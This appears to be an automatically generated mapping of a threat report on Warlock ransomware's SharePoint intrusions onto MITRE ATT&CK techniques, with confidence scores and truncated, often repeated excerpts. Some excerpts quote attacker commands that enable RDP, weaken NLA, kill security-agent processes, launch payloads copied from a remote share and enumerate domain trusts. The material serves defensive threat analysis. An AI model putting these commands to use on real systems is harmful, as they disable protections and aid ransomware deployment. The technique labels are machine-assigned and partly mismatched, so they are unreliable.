“by setting the fDenyTSConnections value at HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server to 0. The system’s security posture is further weakened by disabling Network Level Authentication (NLA) through the UserAuthentication value at HKLM\SYSTEM\CurrentCont…”
T1486 Data Encrypted for Impact (100%)
“the dropping of a ransom note and the presence of encrypted files. Both cases illustrate LockBit 3.0’s continued use of DLL sideloading through legitimate executables to evade detection and achieve execution within compromised systems. We identified another infection containin…”
T1190 Exploit Public-Facing Application (99%)
“end-to-end attack highlights the dangers of delayed patching and the importance of layered defense. Trend Vision One™ detects Warlock IoCs and equips customers with tailored threat hunting queries, insights, and intelligence updates. Introduction: Organizations continue to gra…”
T1486 Data Encrypted for Impact (98%)
“and Warlock in the same attack chains against SharePoint environments, using DLL sideloading via legitimate utilities like 7zip. This suggests Warlock was constructed using the same builder framework that was made public in 2022, highlighting how a single leak enabled the prolife…”
T1069.001 Local Groups (97%)
“administrator group from exploited SharePoint server: parentCmd:(w3wp.exe AND -ap AND SharePoint) AND objectCmd:localgroup administrators * /add. More hunting queries are available for Trend Vision One customers with Threat Insights entitlement enabled. Indicators of Compr…”
T1486 Data Encrypted for Impact (96%)
“in countries such as Portugal, Croatia, and Turkey. Other victims included organizations from the financial services and manufacturing sectors. Warlock also seems to have potential ties to Black Basta, a prolific ransomware group that stopped publishing victims in early 2025. Whi…”
T1003.002 Security Account Manager (92%)
“includes remote administrative shares, to map available files and storage locations across the environment. This is performed using the following command: cmd /c dir <path>. Account Discovery: To identify privileged and user accounts, along with active user sessions, the atta…”
T1059.001 PowerShell (87%)
“evasion and enables the attackers to maintain persistence. Our analysis indicates that the primary victims belong to the finance and electronics industries within the Asia, Middle East, and Africa (AMEA) region. CVE-2023-27532: Despite the vulnerability already being previou…”
T1679 Selective Exclusion (87%)
“and Warlock in the same attack chains against SharePoint environments, using DLL sideloading via legitimate utilities like 7zip. This suggests Warlock was constructed using the same builder framework that was made public in 2022, highlighting how a single leak enabled the prolife…”
T1021.002 SMB/Windows Admin Shares (84%)
“temporary dump files on affected systems. These files are frequently created during the dumping process and may be associated with commands executed via processes like C:\Windows\System32\svchost.exe -k LocalService. Lateral Movement: Server Message Block / Windows Admini…”
T1482 Domain Trust Discovery (84%)
“7.0/cloudflared-windows-amd64.exe. The attacker subsequently performs domain trust enumeration using the Windows utility tool nltest to discover trust relationships between Active Directory domains: nltest /domain_trusts. System Information Collection: The threat actor pr…”
T1484.001 Group Policy Modification (81%)
“sequence of post-exploitation techniques leading to ransomware deployment and data exfiltration. Initial Access: Exploitation of internet-facing on-premise Microsoft SharePoint server. The attack begins with exploitation of Microsoft SharePoint vulnerabilities, allowing the t…”
T1055.001 Dynamic-link Library Injection (79%)
“\vmtools.exe 2>nul || exit" timeout /t 5 taskkill /f /im tm_netagent.exe taskkill /f /im voneagentconsoletray cmd /c copy \{IP address}\{domain name}\* %public%\ /y start /b cmd /c "%public%\{domain name}.exe 2>nul || exit" start /b cmd …”
T1080 Taint Shared Content (75%)
“the dropping of a ransom note and the presence of encrypted files. Both cases illustrate LockBit 3.0’s continued use of DLL sideloading through legitimate executables to evade detection and achieve execution within compromised systems. We identified another infection containin…”
T1482 Domain Trust Discovery (72%)
“using the previously installed malicious driver. Attempts to terminate Trend processes or services are automatically blocked and logged by our self-protection technology. This activity is promptly reported to the management console, ensuring administrators are alerted to potent…”
T1486 Data Encrypted for Impact (71%)
“can weaponize enterprise vulnerabilities for high-impact extortion activities. Through the exploitation of the SharePoint vulnerabilities, attackers were able to bypass authentication, achieve remote code execution (RCE), and rapidly pivot across compromised networks. In this…”
T1080 Taint Shared Content (70%)
“by setting the fDenyTSConnections value at HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server to 0. The system’s security posture is further weakened by disabling Network Level Authentication (NLA) through the UserAuthentication value at HKLM\SYSTEM\CurrentCont…”
T1003.001 LSASS Memory (70%)
“includes remote administrative shares, to map available files and storage locations across the environment. This is performed using the following command: cmd /c dir <path>. Account Discovery: To identify privileged and user accounts, along with active user sessions, the atta…”
T1021.002 SMB/Windows Admin Shares (69%)
“) first establishes a network connection to a remote file share using hardcoded credentials. It then systematically copies files such as vmtools.exe and log.bat (renamed to log.txt), as well as the files from the remote share \{IP address}\{domain name}\ — including …”
T1003 OS Credential Dumping (69%)
“evasion and enables the attackers to maintain persistence. Our analysis indicates that the primary victims belong to the finance and electronics industries within the Asia, Middle East, and Africa (AMEA) region. CVE-2023-27532: Despite the vulnerability already being previou…”
T1574.001 DLL (65%)
“loading technique, where it loads the malicious mpclient.dll file. In the incident we analyzed, mpclient.dll itself was the LockBit 3.0 ransomware payload, which was directly executed by the MpCmdRun.exe tool. This method was also previously seen in LockBit 3.0 campaigns tha…”
T1190 Exploit Public-Facing Application (64%)
“Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware. Ransomware. Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware. Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal crede…”
T1486 Data Encrypted for Impact (61%)
“loading technique, where it loads the malicious mpclient.dll file. In the incident we analyzed, mpclient.dll itself was the LockBit 3.0 ransomware payload, which was directly executed by the MpCmdRun.exe tool. This method was also previously seen in LockBit 3.0 campaigns tha…”
T1489 Service Stop (60%)
“…LAV.I. The attacker deploys a binary named vmtools.exe (identified as Trojan.Win64.KILLLAV.I) to enumerate running processes and terminate those specified in the log.txt file. All the targeted processes are associated with Trend security products. It drops an encrypted d…”
T1486 Data Encrypted for Impact (57%)
“Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware. Ransomware. Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware. Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal crede…”
T1679 Selective Exclusion (55%)
“by setting the fDenyTSConnections value at HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server to 0. The system’s security posture is further weakened by disabling Network Level Authentication (NLA) through the UserAuthentication value at HKLM\SYSTEM\CurrentCont…”
T1003 OS Credential Dumping (50%)
“to extract stored credentials from the Veeam database. Disk Overwriting with writenull.exe: The writenull.exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. Attackers, including ransomware operators, m…”
T1552.001 Credentials In Files (48%)
“to extract stored credentials from the Veeam database. Disk Overwriting with writenull.exe: The writenull.exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. Attackers, including ransomware operators, m…”
T1505.004 IIS Components (48%)
“\vmtools.exe 2>nul || exit" timeout /t 5 taskkill /f /im tm_netagent.exe taskkill /f /im voneagentconsoletray cmd /c copy \{IP address}\{domain name}\* %public%\ /y start /b cmd /c "%public%\{domain name}.exe 2>nul || exit" start /b cmd …”
T1053.005 Scheduled Task (48%)
“\vmtools.exe 2>nul || exit" timeout /t 5 taskkill /f /im tm_netagent.exe taskkill /f /im voneagentconsoletray cmd /c copy \{IP address}\{domain name}\* %public%\ /y start /b cmd /c "%public%\{domain name}.exe 2>nul || exit" start /b cmd …”
T1059.001 PowerShell (47%)
“using the previously installed malicious driver. Attempts to terminate Trend processes or services are automatically blocked and logged by our self-protection technology. This activity is promptly reported to the management console, ensuring administrators are alerted to potent…”
T1003.001 LSASS Memory (47%)
“to extract stored credentials from the Veeam database. Disk Overwriting with writenull.exe: The writenull.exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. Attackers, including ransomware operators, m…”
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (43%)
“…01-2k16 cj-dc01-2k16 cj-dc02-dr-2k16. Command-and-Control Server: The attacker sets up a stealthy command-and-control (C&C) channel inside the compromised environment. In this specific incident, protocol tunneling was implemented using a Cloudflare binary …”
T1098 Account Manipulation (39%)
“sequence of post-exploitation techniques leading to ransomware deployment and data exfiltration. Initial Access: Exploitation of internet-facing on-premise Microsoft SharePoint server. The attack begins with exploitation of Microsoft SharePoint vulnerabilities, allowing the t…”
T1105 Ingress Tool Transfer (39%)
“"-a \\.\pipe\iisipm4f1f605b-0c8e-4499-89cb-98c2c98832ad -h "C:\inetpub\temp\apppools\SharePoint - 80\SharePoint - 80[.]config" -w "" -m 0. The attack sequence continues with the drop and execution of cloudflare.bat in C:\ProgramData\, which …”
T1486 Data Encrypted for Impact (37%)
“to extract stored credentials from the Veeam database. Disk Overwriting with writenull.exe: The writenull.exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. Attackers, including ransomware operators, m…”
T1570 Lateral Tool Transfer (35%)
“temporary dump files on affected systems. These files are frequently created during the dumping process and may be associated with commands executed via processes like C:\Windows\System32\svchost.exe -k LocalService. Lateral Movement: Server Message Block / Windows Admini…”
T1003.004 LSA Secrets (33%)
“includes remote administrative shares, to map available files and storage locations across the environment. This is performed using the following command: cmd /c dir <path>. Account Discovery: To identify privileged and user accounts, along with active user sessions, the atta…”
T1055.001 Dynamic-link Library Injection (33%)
“loading technique, where it loads the malicious mpclient.dll file. In the incident we analyzed, mpclient.dll itself was the LockBit 3.0 ransomware payload, which was directly executed by the MpCmdRun.exe tool. This method was also previously seen in LockBit 3.0 campaigns tha…”
T1588.001 Malware (32%)
“in countries such as Portugal, Croatia, and Turkey. Other victims included organizations from the financial services and manufacturing sectors. Warlock also seems to have potential ties to Black Basta, a prolific ransomware group that stopped publishing victims in early 2025. Whi…”
T1543.003 Windows Service (32%)
“…LAV.I. The attacker deploys a binary named vmtools.exe (identified as Trojan.Win64.KILLLAV.I) to enumerate running processes and terminate those specified in the log.txt file. All the targeted processes are associated with Trend security products. It drops an encrypted d…”
T1486 Data Encrypted for Impact (32%)
“. To defend against Warlock ransomware and similar threats, organizations should promptly patch their on-premises SharePoint servers. In addition to Microsoft’s security updates, Trend has released targeted updates, proactive detection rules, and network filters that can help…”
T1080 Taint Shared Content (32%)
“) first establishes a network connection to a remote file share using hardcoded credentials. It then systematically copies files such as vmtools.exe and log.bat (renamed to log.txt), as well as the files from the remote share \{IP address}\{domain name}\ — including …”
T1190 Exploit Public-Facing Application (32%)
“. To defend against Warlock ransomware and similar threats, organizations should promptly patch their on-premises SharePoint servers. In addition to Microsoft’s security updates, Trend has released targeted updates, proactive detection rules, and network filters that can help…”
Summary
Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal credentials, move laterally, and deploy ransomware with data exfiltration across enterprise environments.